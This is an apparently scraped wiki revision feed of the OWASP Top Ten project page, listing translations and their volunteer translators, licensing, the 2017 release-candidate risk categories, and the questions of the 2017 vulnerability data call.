* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=231973</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=231973"/>
				<updated>2017-08-02T21:03:35Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: First of several updates for 2017 RC2 announcement&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 - Industry survey open and data call reopened==&lt;br /&gt;
&lt;br /&gt;
The data call for the 2017 Top 10 has been reopened. All industry professionals are encouraged to complete [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 this survey] to help determine up to two items in the 2017 Top 10. Security analysts, pentesters, and security vendors can submit bulk data of their results at the [https://goo.gl/forms/tLgyvK9O74r7wMkt2 call for data]. This [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html OWASP blog posting] describes the process in detail. &lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 2017 – RC1 rejected==&lt;br /&gt;
&lt;br /&gt;
During the [https://owaspsummit.org/website/ OWASP Summit 2017], several sessions took place discussing many different aspects of the OWASP Top 10, for example, governance and validation, the data collection process, data assessment and review of the new suggested A7 and A10.&lt;br /&gt;
Main [https://owaspsummit.org/Outcomes/Owasp-Top-10-2017/Owasp-Top-10-2017.html outcomes of the OWASP Summit] include:&lt;br /&gt;
* RC1 of the OWASP Top 10 2017 has been rejected&lt;br /&gt;
* A1, A2, A3, A4, A5, A6, A8, A9 have been left untouched by consensus view&lt;br /&gt;
* Requirement to choose two additional items&lt;br /&gt;
* Appeal for data and opinion is open until September 18, 2017 ([https://github.com/OWASP/Top10/issues submit here])&lt;br /&gt;
* The new OWASP Top 10 2017 is to be released in late November 2017.&lt;br /&gt;
* New project leadership put in place.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- I think it makes sense just to delete this text - Neil Smithline&lt;br /&gt;
==OWASP Top 10 - 2017 Release Candidate ==&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
{{Social Media Links}}&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is the OWASP Top 10? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 provides:&lt;br /&gt;
&lt;br /&gt;
* '''A list of the 10 Most Critical Web Application Security Risks'''&lt;br /&gt;
&lt;br /&gt;
For each Risk it provides:&lt;br /&gt;
* A description&lt;br /&gt;
* Example vulnerabilities&lt;br /&gt;
* Example attacks&lt;br /&gt;
* Guidance on how to avoid&lt;br /&gt;
* References to OWASP and other related resources&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_10/Mapping_to_WHID | OWASP Top 10 Mapped to the Web Hacking Incident Database]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Top-10&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 2017 Release Candidate - PDF]&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Covering Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Email List ==&lt;br /&gt;
[https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [11 Jul 2017] OWASP Top 10 2017 – The appeal for data and opinions is still open&lt;br /&gt;
* [10 Apr 2017] OWAP Top 10 - 2017 Release Candidate Published&lt;br /&gt;
* [17 Dec 2016] OWASP Top 10 - 2017 Data Call Data Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
* [Feb 2013] OWASP Top 10 - 2013 - Release Candidate Published&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2017 Release Candidate 1 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here.]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.&lt;br /&gt;
&lt;br /&gt;
We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.&lt;br /&gt;
&lt;br /&gt;
For 2017, the OWASP Top 10 Most Critical Web Application Security Risks (in the Release Candidate) are:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management&lt;br /&gt;
* A3 Cross-Site Scripting (XSS)&lt;br /&gt;
* A4 Broken Access Control (As it was in 2004)&lt;br /&gt;
* A5 Security Misconfiguration&lt;br /&gt;
* A6 Sensitive Data Exposure&lt;br /&gt;
* A7 Insufficient Attack Protection (NEW)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities&lt;br /&gt;
* A10 Underprotected APIs (NEW)&lt;br /&gt;
&lt;br /&gt;
== 2017 Update Data Call Data ==&lt;br /&gt;
&lt;br /&gt;
DATA CALL RESULTS ARE NOW PUBLIC: The [https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true results of this data call have been made public here] as an Excel spreadsheet with 4 tabs. Three of the tabs have raw data as submitted, organized into three vulnerability data size categories: large, small, and none. A 4th tab includes some basic analysis of the large size submissions. The OWASP Top 10 project thanks all the submitters for their input to the OWASP Top 10 - 2017.&lt;br /&gt;
&lt;br /&gt;
On May 20, 2016, the Top 10 project made a public announcement of the data call for the 2017 update to the OWASP Top 10. Contributors filled out the Google form posted here:  [https://docs.google.com/forms/d/1sBMHN5nBicjr5xSo04xkdP5JlCnXFcKFCgEHjwPGuLw/viewform?c=0&amp;amp;w=1&amp;amp;usp=mail_form_link OWASP Top 10 - 2017 Data Call], which had the questions listed below.&lt;br /&gt;
&lt;br /&gt;
Page 1 of 5: Submitter Info&lt;br /&gt;
&lt;br /&gt;
* Name of Company/Organization *&lt;br /&gt;
* Company/Organization Web Site *&lt;br /&gt;
* Point of Contact Name *&lt;br /&gt;
* Point of Contact E-Mail *&lt;br /&gt;
&lt;br /&gt;
Page 2 of 5: Background on Applications&lt;br /&gt;
&lt;br /&gt;
* During what year(s) was this data collected? *&lt;br /&gt;
** 2014&lt;br /&gt;
** 2015&lt;br /&gt;
** Both 2014 &amp;amp; 2015&lt;br /&gt;
*** If the application vulnerability data you are submitting was extracted from a publicly available report, please provide a link to that report (or reports), and the relevant page number(s)&lt;br /&gt;
&lt;br /&gt;
* How many web applications do the submitted results cover? * We consider web apps, web services, and the server side of mobile apps to all be web apps.&lt;br /&gt;
&lt;br /&gt;
* What were the primary programming languages the applications you reviewed written in? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Java&lt;br /&gt;
** .NET&lt;br /&gt;
** Python&lt;br /&gt;
** PHP&lt;br /&gt;
** Ruby&lt;br /&gt;
** Grails&lt;br /&gt;
** Play&lt;br /&gt;
** Node.js&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Please supply the exact percentage of applications per language checked off above:&lt;br /&gt;
&lt;br /&gt;
* What were the primary industries these applications supported? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Financial&lt;br /&gt;
** Healthcare&lt;br /&gt;
** eCommerce&lt;br /&gt;
** Internet/Social Media&lt;br /&gt;
** Airline&lt;br /&gt;
** Energy&lt;br /&gt;
** Entertainment (Games/Music/Movies)&lt;br /&gt;
** Government&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Where in the world were the application owners primarily? Again - select those where 5% or more of your results came from&lt;br /&gt;
** North America&lt;br /&gt;
** Europe&lt;br /&gt;
** AsiaPac&lt;br /&gt;
** South America&lt;br /&gt;
** Middle East&lt;br /&gt;
** Africa&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 3 of 5: Assessment Team and Detection Approach&lt;br /&gt;
&lt;br /&gt;
* What type of team did the bulk of this work? *&lt;br /&gt;
** Internal Assessment Team(s)&lt;br /&gt;
** Consulting Organization&lt;br /&gt;
** Product Vendor/Service Provider (e.g., SaaS)&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
*What type of analysis tools do they use? * Check all that apply.&lt;br /&gt;
** Free/Open Source Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Free/Open Source Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Free/Open Source Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Commercial Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Commercial Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial DAST/IAST Hybrid Analysis Tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Which analysis tools do you frequently use? This includes both free, commercial, and custom (in house) tools - List tools by name&lt;br /&gt;
&lt;br /&gt;
* What is your primary assessment methodology? * Primary being the majority of your assessments follow this approach&lt;br /&gt;
** Raw (untriaged) output of automated analysis tool results using default rules&lt;br /&gt;
** Automated analysis tool results - with manual false positive analysis/elimination&lt;br /&gt;
** Output from manually tailored automated analysis tool(s)&lt;br /&gt;
** Output from manually tailored automated analysis tool(s) - with manual false positive analysis/elimination&lt;br /&gt;
** Manual expert penetration testing (Expected to be tool assisted w/ free DAST tool(s))&lt;br /&gt;
** Manual expert penetration testing with commercial DAST tool(s)&lt;br /&gt;
** Manual expert code review (Using IDE and other free code review aids)&lt;br /&gt;
** Manual expert code review with commercial SAST tool(s)&lt;br /&gt;
** Combined manual expert code review and penetration testing with only free tools&lt;br /&gt;
** Combined manual expert code review and penetration testing with only commercial tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 4 of 5: Application Vulnerability Data&lt;br /&gt;
&lt;br /&gt;
Each question asks the number of vulnerabilities found for a particular type of vulnerability. At the end, is one catch all text question where you can add other types of vulnerabilities and their counts. If you prefer, just send your vulnerability data in a spreadsheet to brian.glas@owasp.org with these columns: CATEGORY NAME, CWE #, COUNT after you submit the rest of your input via this data call. ideally it would come from the email address you specified in the Point of Contact E-Mail question on Page 1 so its easy to correlate the two.&lt;br /&gt;
&lt;br /&gt;
* Number of SQL Injection Vulnerabilities Found (CWE-89)?&lt;br /&gt;
* Number of Hibernate Injection Vulnerabilities Found (CW-564)?&lt;br /&gt;
* Number of Command Injection Vulnerabilities Found (CWE-77)?&lt;br /&gt;
* Number of Authentication Vulnerabilities Found (CWE-287)?&lt;br /&gt;
* Number of Session Fixation Vulnerabilities Found (CWE-384)?&lt;br /&gt;
* Number of Cross-Site Scripting (XSS) Vulnerabilities Found (CWE-79)?&lt;br /&gt;
* Number of DOM-Based XSS Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Insecure Direct Object Reference Vulnerabilities Found (CWE-639)?&lt;br /&gt;
* Number of Path Traversal Vulnerabilities Found (CWE-22)?&lt;br /&gt;
* Number of Missing Authorization Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Security Misconfiguration Vulnerabilities Found (CWE-2)?&lt;br /&gt;
* Number of Cleartext Transmission of Sensitive Information Vulnerabilities Found (CWE-319)?&lt;br /&gt;
* Number of Cleartext Storage of Sensitive Information Vulnerabilities Found (CWE-312)?&lt;br /&gt;
* Number of Weak Encryption Vulnerabilities Found (CWE-326)?&lt;br /&gt;
* Number of Cryptographic Vulnerabilities Found (CWEs-310/326/327/etc)?&lt;br /&gt;
** You can report them all lumped together in 310 or in their individual categories. However you want.&lt;br /&gt;
* Number of Improper (Function Level) Access Control Vulnerabilities Found (CWE-285)?&lt;br /&gt;
